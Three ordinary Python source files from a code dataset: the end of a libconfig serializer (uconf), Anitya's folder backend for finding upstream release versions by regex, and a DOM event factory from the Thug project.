        # Message fixed for the typo ("must by") and renamed from
        # "libconf.loads" to match this module's actual name (uconf),
        # consistent with load() above.
        raise TypeError("uconf.loads() input string must be unicode")
    return load(f, filename=filename, includedir=includedir)
# dump() logic
##############
def dump_int(i):
    '''Stringize ``i``, appending an 'L' suffix when ``i`` exceeds the
    32-bit signed integer range (libconfig's 64-bit literal syntax).
    '''
    if SMALL_INT_MIN <= i <= SMALL_INT_MAX:
        return str(i)
    return str(i) + 'L'
def dump_string(s):
    r'''Stringize ``s``, adding double quotes and escaping as necessary

    Backslash escape backslashes, double quotes, ``\f``, ``\n``, ``\r``, and
    ``\t``. Escape all remaining unprintable characters in ``\xFF``-style.
    The returned string will be surrounded by double quotes.
    '''
    # Backslash must be escaped first so later escapes aren't doubled.
    replacements = (('\\', '\\\\'), ('"', '\\"'), ('\f', r'\f'),
                    ('\n', r'\n'), ('\r', r'\r'), ('\t', r'\t'))
    for plain, escaped in replacements:
        s = s.replace(plain, escaped)
    # \xFF-escape any remaining control characters (C0 range and DEL).
    s = re.sub(r'[\x00-\x1F\x7F]',
               lambda m: r'\x{:02x}'.format(ord(m.group(0))),
               s)
    return '"%s"' % (s,)
def dump_value(key, value, f, indent=0):
    '''Save a value of any libconfig type

    This function takes ``key`` and ``value`` and serializes them
    into ``f``. If ``key`` is ``None``, a list-style output is produced.
    Otherwise, output has ``key = value`` format.

    Mapping of Python types to libconfig syntax: dict -> group {...},
    tuple -> list (...), Python list -> array [...], plus scalar
    strings, integers and floats.  Anything else raises
    ConfigSerializeError.
    '''
    spaces = ' ' * indent
    if key is None:
        key_prefix = ''
        key_prefix_nl = ''
    else:
        key_prefix = key + ' = '
        key_prefix_nl = key + ' = ' + spaces
    if isinstance(value, dict):
        f.write(u'{}{}{{\n'.format(spaces, key_prefix_nl))
        dump_dict(value, f, indent + 4)
        f.write(u'{}}}'.format(spaces))
    elif isinstance(value, tuple):
        f.write(u'{}{}(\n'.format(spaces, key_prefix_nl))
        dump_collection(value, f, indent + 4)
        f.write(u'\n{})'.format(spaces))
    elif isinstance(value, list):
        f.write(u'{}{}[\n'.format(spaces, key_prefix_nl))
        dump_collection(value, f, indent + 4)
        f.write(u'\n{}]'.format(spaces))
    elif isstr(value):
        f.write(u'{}{}{}'.format(spaces, key_prefix, dump_string(value)))
    elif isint(value):
        f.write(u'{}{}{}'.format(spaces, key_prefix, dump_int(value)))
    elif isinstance(value, float):
        f.write(u'{}{}{}'.format(spaces, key_prefix, value))
    else:
        raise ConfigSerializeError("Can not serialize object %r of type %s" %
                                   (value, type(value)))
def dump_collection(cfg, f, indent=0):
    '''Save a collection of attributes, comma-separated, one per line'''
    last_index = len(cfg) - 1
    for index, item in enumerate(cfg):
        dump_value(None, item, f, indent)
        if index != last_index:
            f.write(u',\n')
def dump_dict(cfg, f, indent=0):
    '''Save a dictionary of attributes, one ``key = value`` line each'''
    for key, value in cfg.items():
        if not isstr(key):
            raise ConfigSerializeError("Dict keys must be strings: %r" %
                                       (key,))
        dump_value(key, value, f, indent)
        f.write(u'\n')
def dumps(cfg):
    '''Serialize ``cfg`` into a libconfig-formatted ``str``

    ``cfg`` must be a ``dict`` with ``str`` keys and libconf-supported values
    (numbers, strings, booleans, possibly nested dicts, lists, and tuples).

    Returns the formatted string.
    '''
    buffer = io.StringIO()
    dump(cfg, buffer)
    return buffer.getvalue()
def dump(cfg, f):
    '''Serialize ``cfg`` as a libconfig-formatted stream into ``f``

    ``cfg`` must be a ``dict`` with ``str`` keys and libconf-supported values
    (numbers, strings, booleans, possibly nested dicts, lists, and tuples).

    ``f`` must be a ``file``-like object with a ``write()`` method.
    '''
    # Guard clause: only dict-rooted configs are serializable.
    if isinstance(cfg, dict):
        dump_dict(cfg, f, 0)
        return
    raise ConfigSerializeError(
        'dump() requires a dict as input, not %r of type %r' %
        (cfg, type(cfg)))
# Factory returning an empty, attribute-accessible config namespace.
def namespace(): return AttrDict()
# True when *v* can act as a config namespace (any dict-like mapping).
def isnamespace(v): return isinstance(v, dict)
| uDeviceX/uDeviceX | pre/uconf/src/uconf.py | Python | gpl-2.0 | 20,089 |
# -*- coding: utf-8 -*-
"""
(c) 2014 - Copyright Red Hat Inc
Authors:
Pierre-Yves Chibon <pingou@pingoured.fr>
"""
import re

import six

from anitya.lib.backends import (
    BaseBackend, get_versions_by_regex_for_text, REGEX)
from anitya.lib.exceptions import AnityaPluginException
DEFAULT_REGEX = 'href="([0-9][0-9.]*)/"'
class FolderBackend(BaseBackend):
    ''' The custom class for project having a special hosting.

    This backend allows to specify a version_url and a regex that will
    be used to retrieve the version information.
    '''

    name = 'folder'
    examples = [
        'http://ftp.gnu.org/pub/gnu/gnash/',
        'http://subsurface.hohndel.org/downloads/',
    ]

    @classmethod
    def get_version(cls, project):
        ''' Method called to retrieve the latest version of the projects
        provided, project that relies on the backend of this plugin.

        :arg Project project: a :class:`model.Project` object whose backend
            corresponds to the current plugin.
        :return: the latest version found upstream
        :return type: str
        :raise AnityaPluginException: a
            :class:`anitya.lib.exceptions.AnityaPluginException` exception
            when the version cannot be retrieved correctly
        '''
        return cls.get_ordered_versions(project)[-1]

    @classmethod
    def get_versions(cls, project):
        ''' Method called to retrieve all the versions (that can be found)
        of the projects provided, project that relies on the backend of
        this plugin.

        :arg Project project: a :class:`model.Project` object whose backend
            corresponds to the current plugin.
        :return: a list of all the possible releases found
        :return type: list
        :raise AnityaPluginException: a
            :class:`anitya.lib.exceptions.AnityaPluginException` exception
            when the versions cannot be retrieved correctly
        '''
        url = project.version_url
        try:
            req = cls.call_url(url, insecure=project.insecure)
        except Exception as err:
            raise AnityaPluginException(
                'Could not call : "%s" of "%s", with error: %s' % (
                    url, project.name, str(err)))
        versions = None
        if not isinstance(req, six.string_types):
            req = req.text
        try:
            # Escape every regex metacharacter in the project name before
            # interpolating it into the pattern.  The old code only handled
            # '+' (and did so via the non-raw literal '\+', an invalid
            # escape sequence in newer Pythons).
            regex = REGEX % {'name': re.escape(project.name)}
            versions = get_versions_by_regex_for_text(
                req, url, regex, project)
        except AnityaPluginException:
            # Fall back to the generic "version-looking folder link" regex.
            versions = get_versions_by_regex_for_text(
                req, url, DEFAULT_REGEX, project)
        return versions
| pombredanne/anitya | anitya/lib/backends/folder.py | Python | gpl-2.0 | 2,702 |
#!/usr/bin/env python
from thug.DOM.W3C.Core.DOMException import DOMException
from .HTMLEvent import HTMLEvent
from .MouseEvent import MouseEvent
from .MutationEvent import MutationEvent
from .StorageEvent import StorageEvent
from .UIEvent import UIEvent
# Map the eventType names accepted by DocumentEvent.createEvent() to their
# event classes; both the singular and the DOM-Level-2 plural spellings
# resolve to the same class.
EventMap = {
    "HTMLEvent"      : HTMLEvent,
    "HTMLEvents"     : HTMLEvent,
    "MouseEvent"     : MouseEvent,
    "MouseEvents"    : MouseEvent,
    "MutationEvent"  : MutationEvent,
    "MutationEvents" : MutationEvent,
    "StorageEvent"   : StorageEvent,
    "UIEvent"        : UIEvent,
    "UIEvents"       : UIEvent
}
# Introduced in DOM Level 2
class DocumentEvent(object):
    """DOM Level 2 DocumentEvent interface: a factory for Event objects."""

    def __init__(self, doc):
        # Owning document, retained for API parity with the other mixins.
        self.doc = doc

    def createEvent(self, eventType):
        """Instantiate and return the event class registered for *eventType*.

        Raises DOMException(NOT_SUPPORTED_ERR) for unknown event types.
        """
        try:
            factory = EventMap[eventType]
        except KeyError:
            raise DOMException(DOMException.NOT_SUPPORTED_ERR)
        return factory()
| pdelsante/thug | thug/DOM/W3C/Events/DocumentEvent.py | Python | gpl-2.0 | 876 |